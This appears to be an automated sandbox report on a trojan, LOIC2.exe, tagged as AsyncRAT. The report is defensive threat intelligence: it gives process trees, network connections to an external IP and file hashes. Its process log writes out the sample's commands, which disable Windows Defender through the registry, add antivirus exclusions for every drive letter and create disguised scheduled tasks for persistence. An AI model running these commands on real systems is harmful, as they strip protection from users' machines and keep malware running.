Analysis Overview
SHA256
f47616e1ab4fc52d125b91a94eef6e87f7589b5d664d3dcdaef7063d80149b64
Threat Level: Known bad
The file LOIC2.exe was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
MetaSploit
AsyncRat
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 22:13
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-19 22:13
Reported
2024-06-19 22:16
Platform
win11-20240508-en
Max time kernel
143s
Max time network
148s
Command Line
Signatures
AsyncRat
MetaSploit
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOlC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\COM Surrogate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\LOIC2.exe
"C:\Users\Admin\AppData\Local\Temp\LOIC2.exe"
C:\Users\Admin\AppData\Local\LOlC.exe
"C:\Users\Admin\AppData\Local\LOlC.exe"
C:\Users\Admin\AppData\Local\Runtime Broker.exe
"C:\Users\Admin\AppData\Local\Runtime Broker.exe"
C:\Users\Admin\AppData\Local\LOIC.exe
"C:\Users\Admin\AppData\Local\LOIC.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\LOlC.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7D5E.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Users\Admin\AppData\Roaming\COM Surrogate.exe
"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
"C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Windows\SYSTEM32\rundll32.exe
rundll32
Network
| Country | Destination | Domain | Proto |
| DE | 193.161.193.99:21265 | tcp | |
| DE | 193.161.193.99:52695 | tcp | |
| N/A | 127.0.0.1:3334 | tcp | |
| N/A | 127.0.0.1:3334 | tcp | |
| DE | 193.161.193.99:21265 | tcp | |
| DE | 193.161.193.99:21265 | tcp | |
| IE | 52.111.236.22:443 | tcp | |
| DE | 193.161.193.99:21265 | tcp | |
| N/A | 127.0.0.1:3334 | tcp | |
| DE | 193.161.193.99:21265 | tcp |
Files
memory/3956-0-0x00000000004F0000-0x00000000009AE000-memory.dmp
memory/3956-1-0x00007FFA20DB3000-0x00007FFA20DB5000-memory.dmp
C:\Users\Admin\AppData\Local\LOlC.exe
| MD5 | e6b7d05c7a4369dd9112959795bb3521 |
| SHA1 | 80c60595def3cbb2d126e3c86c9a1b92572b55b7 |
| SHA256 | 10eb620d956a63295cd933a3bad5769b1f8b0eec8b3748569467c82fb61e295c |
| SHA512 | baa982104c839f9f0893dc2940b418fc64fcc9e964a2791c176f7e7795ee7732429287d84f5d37bea15882a6462eaa7f7996bf283a27a0718ee96054a396a806 |
C:\Users\Admin\AppData\Local\Runtime Broker.exe
| MD5 | 9c3ad681c33d3fb6934102a35cb7a2ad |
| SHA1 | d3630943b6af7b956eb459fc2e8f5137f2f5f8a1 |
| SHA256 | 9625d7f8c8ddded4818a03ec7912c0df6ce464a95eb055b01a15fe3aa373305b |
| SHA512 | ea310b840455b8279c72ccb8e45f27b6ec861baf66d223b584d790bdca6426b54729eb7c80163c8e6ce1e88044088c1167109be0cb9418935d70ef42a6bbd466 |
C:\Users\Admin\AppData\Local\LOIC.exe
| MD5 | e6fa3028cd03318496852718143d256f |
| SHA1 | 4c85973d612cd1955163c244c9c334d3a0c507cb |
| SHA256 | f60a52512773b52def9ba9ce8aad61144d2cf351f6bc04d1c5a13abef8f3b89b |
| SHA512 | 29089eccd1e670570fecafdd682f0ec13bc55fb17cdc0938ff4c6fd32c55c1919e26fad5b3ffed78217a94a9e8aba768cdf092ffc85f6ab19fbede0dc0fae0bb |
memory/1816-32-0x0000000000070000-0x0000000000086000-memory.dmp
memory/1680-37-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/1816-40-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qkqasfpu.gzp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4604-49-0x000001473C1F0000-0x000001473C212000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 437395ef86850fbff98c12dff89eb621 |
| SHA1 | 9cec41e230fa9839de1e5c42b7dbc8b31df0d69c |
| SHA256 | 9c39f3e1ee674a289926fddddfc5549740c488686ec6513f53848a225c192ba6 |
| SHA512 | bc669893f5c97e80a62fc3d15383ed7c62ffc86bc986401735903019bb96a5f13e4d0f6356baa2021267503a4eb62681e58e28fcff435350e83aa425fa76cd64 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1f8c0b83fd829b5fc0d0d02e03e18e0f |
| SHA1 | d17973f51bcd33c7b29d5723c23a0fa12c97ae08 |
| SHA256 | acde3af9279f0a05ba6ee73296ed0497aa4b571b58cfe3bbe8364cf442c0b7e9 |
| SHA512 | e4e1a5e053255e526c2f70085b6928799aac96a74378d440ffbd9fdaa4fdb7106a6d587b348d40ee16aa6769b8d5b28a4f9a4082d39cc9b13694813fd37ff88f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 190b28f40c0edd3cc08d0fd3aca4779a |
| SHA1 | 425b98532b6a18aa2baece47605f1cf6c8cfbd11 |
| SHA256 | 8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce |
| SHA512 | 8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b1c1fe85a9cd8fa09682d3ff82540ac5 |
| SHA1 | 85fa1d0d71c76d1cd02c59a928c582da1f39ddf5 |
| SHA256 | 6592c430c3d57a89177dd054c34d64b72e2c7ed73b93a854187809e48c3348c0 |
| SHA512 | bd131eaa683df3b099e69ca736a33bb9db19bd164caa9f2977b45b41da4d83654a6a69018d5ad343a45e8dd9d69a2a176848b35d2661d80330222c175d0bd122 |
memory/1816-86-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp7D5E.tmp.bat
| MD5 | c1d3f64b7e8f5f8cbd12a45c2a5235b0 |
| SHA1 | 4e8b3837a3a0fdb1f318f7f194c41ac15492fd36 |
| SHA256 | 77305a6f3847225c1e8e4e934016bc8873f85653a2f702d071dc310e9ee443ca |
| SHA512 | 3a2fcfb26c4efcb72016e4a2176874553534dfebf84e8f26c16aeba371501b9fd6a2c2a8c0657daf27d715fc0c598b85d7a75a6b81c358ee5677d27fa9e1d541 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4093e5ab3812960039eba1a814c2ffb0 |
| SHA1 | b5e4a98a80be72fccd3cc910e93113d2febef298 |
| SHA256 | c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c |
| SHA512 | f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 051a74485331f9d9f5014e58ec71566c |
| SHA1 | 4ed0256a84f2e95609a0b4d5c249bca624db8fe4 |
| SHA256 | 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888 |
| SHA512 | 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8cb7f4b4ab204cacd1af6b29c2a2042c |
| SHA1 | 244540c38e33eac05826d54282a0bfa60340d6a1 |
| SHA256 | 4994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6 |
| SHA512 | 7651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8082885362359f72fb414d2fa6ad357d |
| SHA1 | c6111820bcf1adf9ac4e8a441d984790465b6393 |
| SHA256 | 0b70605985f4148a236426049c44406110e9edc165a0501f636015a30340beef |
| SHA512 | b5d227b5ac6549566d7456616b98fe9aa62f6721be43a9e5674c35c2c9d218f7fec0fea978bdaff3ec73b6591c6e41efa8946526c2ab473da1c443a5a851a145 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a287707e1e76dd9e002b1961be29ad0 |
| SHA1 | 8ec256db90072b98064e986d58be4ffc7a04a4cf |
| SHA256 | c32cacc7309da41133879871e0c04b81c8349d9f04e73592327f05aeefedb304 |
| SHA512 | 08472fd732d9b491badc2519a73d2bc21031a8f72e4e910ec9f117b7feb2431f84e2620c6e3e9010038a4bbc599942421458d0732032411944dc6bec3fc1428c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34c8b93dd58a4703db0d6dd86bb21d70 |
| SHA1 | b53aa49b882070b857951b6638d6da3a03ac2f56 |
| SHA256 | 34b95e4d12196f68f7a030b98190fda89c34b696251ab9ed831e48d983896898 |
| SHA512 | bba4a86b8a66104ed21fd58717168cdf68b93c801a94ec65e25c2b66c1b9354b9e7c1c01cadde451948e072d96c3fa4994c94ef33aeff9b603e7b5d82f7111e7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4ae54c3a00d1d664f74bfd4f70c85332 |
| SHA1 | 67f3ed7aaea35153326c1f907c0334feef08484c |
| SHA256 | 1e56a98f74d4a604bef716b47ef730d88f93aec57a98c89aa4423394cbc95b5c |
| SHA512 | b3bbdefeaadbdaac00f23ce3389bbd3b565bd7e0079aeebf3e4afba892382e1cd3896c00bb2e5a98146ac593f9bdc5568d0bd08c5b0139f0814b1a38911c3889 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 30656d799f284f3a413497797da0ef69 |
| SHA1 | 0c3d4b17a36cc325cd7368612658fbcec6bdbae3 |
| SHA256 | 4ed53bbf3849f8a749d0938a29436fc3eb5971b578e6ade8a59b773de0765ee5 |
| SHA512 | 69c5870dd584d3aa854ed6e8f2c348d65df0cb45e1a7d4b0880cde115afe51d03e2104726ac3f35fd03a62c1ca8868d8b37350332b19d9d4ca171ec0af38620f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3c0fe86517be16d2b0a671148c0274d2 |
| SHA1 | bd7a487a037395e9ede9e76b4a455fdf386ba8db |
| SHA256 | 5f85aaa0472b8ae98352b7295cd59357e3e585b2299c540e9a8b5848a8d6b302 |
| SHA512 | 642bc58c0a5682b45056e837be0dc5d1cd8c400f0e73f20d17c19720fb1fdae132b86873100955e9d65f72f1d481704b84c30d440ca53898c6d6d6f106b74f0a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c48a9546f28fdfe1d6a35ac54de7c0e9 |
| SHA1 | 180eea6e33bedd72ae3b63907d7369f0c6e78b86 |
| SHA256 | fc6f268436f1e009439e1cd2333720b23d31e0e65b48f61072fb820a8782f672 |
| SHA512 | 9e18fa74caf08c75f8579bd8144452a3cc6e70490f6ad3c227a5143ea5c440871322bfef0c96f064031bb59861fbe709486706fd74a04b4bb96c4ed6db7b0d26 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 311174334b8e31fc10d28c4575e92688 |
| SHA1 | e2b2b2100f0445b4d37cd16f82d3cfcca3abf335 |
| SHA256 | 793aa8f317799c4ad031a7ba58960643c29f03a24b2baba577cc1ccdcbe46a76 |
| SHA512 | e7ddc1cf4443564bee7f00a66f2e533d1d89f6ab9434ea75ae7aeec4e8aa56ba40d27c81e472c92724fc892a7726232280274397d3506d95275af41337fc0135 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 69416944dac24129d0969e2ac46f0533 |
| SHA1 | d71969659956b32411e0606a9bee640a0b108ef4 |
| SHA256 | dffc7e01106427982d7cafd3d7e3be37e16b098fbb0958410ea8d7c68bfb97ca |
| SHA512 | aabb330053579af0d9de2661bd70eaadfd2e2e617759bc9c380db1c64731c6711304e49882138e9d337815377ee012a7458f91f692cb31538d73624385867f4c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 80707036df540b6657f9d443b449e3c3 |
| SHA1 | b3e7d5d97274942164bf93c8c4b8a9b68713f46f |
| SHA256 | 6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0 |
| SHA512 | 65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fea033e3f1e875a316dbf1edee8aa065 |
| SHA1 | aaa73783ca9a3553872a64c57c4b08c82d34b099 |
| SHA256 | 16586dcbfcc2e023da908d1b056637ccbe5d64bdc795b78011b1ce5f39b25601 |
| SHA512 | 12db71dc6f4fe3f672638ff998ac8d3e87ebb0ac569daa8fa2f62b8abff03eafcd4f5aba84d48031d4bde0118cf01cf705a674a8f04abf1a11bb740b9352f7f9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6f0e62045515b66d0a0105abc22dbf19 |
| SHA1 | 894d685122f3f3c9a3457df2f0b12b0e851b394c |
| SHA256 | 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319 |
| SHA512 | f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9dd876d6004f9e894c7d8de6ae950e5b |
| SHA1 | 48f0b4c5f0203788acdeceee62a69df0022dc8d4 |
| SHA256 | 6e19ea46b5d0c9d58c6fc3c6187e5b821f1600cc25d675d25c8fd829f7194344 |
| SHA512 | 3f5be2cb27900546eb791f5d5f1274c787f9a4645647b9943a5502c2167ec8a5d9ab653f2efc088d6ea6e8057b63caf3dce0a376f0b88d62f43b68bfa1518324 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
| MD5 | 1837aea22a774bde2cd2eca02b5995a0 |
| SHA1 | c00b11f612716a5b9f282264538ddc2e041d8981 |
| SHA256 | 3263283f59723e5487b128439d495da10b06f84a84793da717a35e0dd7e3b905 |
| SHA512 | 9f479883cae36152dd2d2bf55e35d2ab05783e214479d12b957d316e4d3c16b63d9dfaf11f3752f9831c182f7c4b06261849042999bac4544fed4011c9fad67b |
memory/3916-307-0x000002B9AC330000-0x000002B9AC331000-memory.dmp
memory/4576-308-0x00007FF75E880000-0x00007FF75ED07000-memory.dmp
memory/564-310-0x00007FF672780000-0x00007FF67286B000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 22:13
Reported
2024-06-19 22:14
Platform
win10-20240404-en
Max time kernel
41s
Max time network
47s
Command Line
Signatures
AsyncRat
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOlC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\COM Surrogate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
